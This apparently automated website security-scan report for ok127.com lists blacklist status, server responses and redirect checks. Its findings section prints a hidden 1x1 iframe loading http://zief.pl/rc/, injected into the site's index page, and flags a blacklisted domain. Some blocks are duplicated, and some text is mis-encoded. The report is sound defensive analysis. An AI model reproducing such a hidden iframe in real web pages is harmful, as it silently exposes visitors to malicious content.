Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ok127.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.ok127.com/ | HTTP/1.1 200 OK Date: Sat, 07 Mar 2015 01:16:18 GMT Accept-Ranges: bytes ETag: "a2cdf6ea6913d01:1f1e3" Server: Microsoft-IIS/6.0 Content-Length: 23843 Content-Location: http://www.ok127.com/index.html Content-Type: text/html Last-Modified: Tue, 09 Dec 2014 04:38:02 GMT X-Died: timeout at scan.pm line 1566. X-Powered-By: ASP.NET | clean |
http://www.ok127.com/index.html | 200 OK Content-Length: 23843 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.3-life.com ...[3450 bytes skipped]... size_3"></div></div> </div> <div class="QQ_move"> <a target="_blank" ref="nofollow" href="http://wpa.qq.com/msgrd?v=3&uin=2094667987&site=qq&menu=yes"><img border="0" src="http://wpa.qq.com/pa?p=2:2541115085:53" alt="µã»÷ÕâÀï¸øÎÒ·¢ÏûÏ¢" title="µã»÷ÕâÀï¸øÎÒ·¢ÏûÏ¢"/></a></div> <div class="friendly"> <a target="_blank" ref="nofollow" href="http://www.3-life.com/"><img border="0" src=images/link_12.jpg></a></div> <div class="fdt"> <div class="fdtbox"> <div class="mov"><a href="#pro"><img src="images/mov.gif"></a></div> </div> </div> <script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? " https://" : " http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_ ...[574 bytes skipped]... Hidden iFrame found. The same iFrame was found in 46 websites. size: 1x1 src: http://zief.pl/rc/ <iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"> | ||
http://www.ok127.com/js/jquery1.42.min.js | 200 OK Content-Length: 72326 Content-Type: application/x-javascript | clean |
http://www.ok127.com/js/jquery.superslide.2.1.1.js | 200 OK Content-Length: 11422 Content-Type: application/x-javascript | clean |
http://www.ok127.com/wforder/template/js/wfdd.js?wfid=03 | 200 OK Content-Length: 1143 Content-Type: application/x-javascript | clean |
http://tb.53kf.com/kf.php?arg=10015335&style=1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sat, 07 Mar 2015 01:16:28 GMT Location: http://www6.53kf.com/kf.php?arg=10015335&style=1 Server: nginx Content-Length: 154 Content-Type: text/html Set-Cookie: SESSION_COOKIE=master2_1; path=/ | clean |
http://www6.53kf.com/kf.php?arg=10015335&style=1 | 200 OK Content-Length: 57111 Content-Type: text/javascript | clean |
http://www.top298.com/qq/Count.js?uin=10 | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.top298.com/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ok127.com
Result:
GET / HTTP/1.1
Host: ok127.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ok127.com
Referer: http://www.google.com/search?q=ok127.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ok127.com
Referer: http://www.google.com/search?q=ok127.com
Result:
The result is similar to the first query. There are no suspicious redirects found.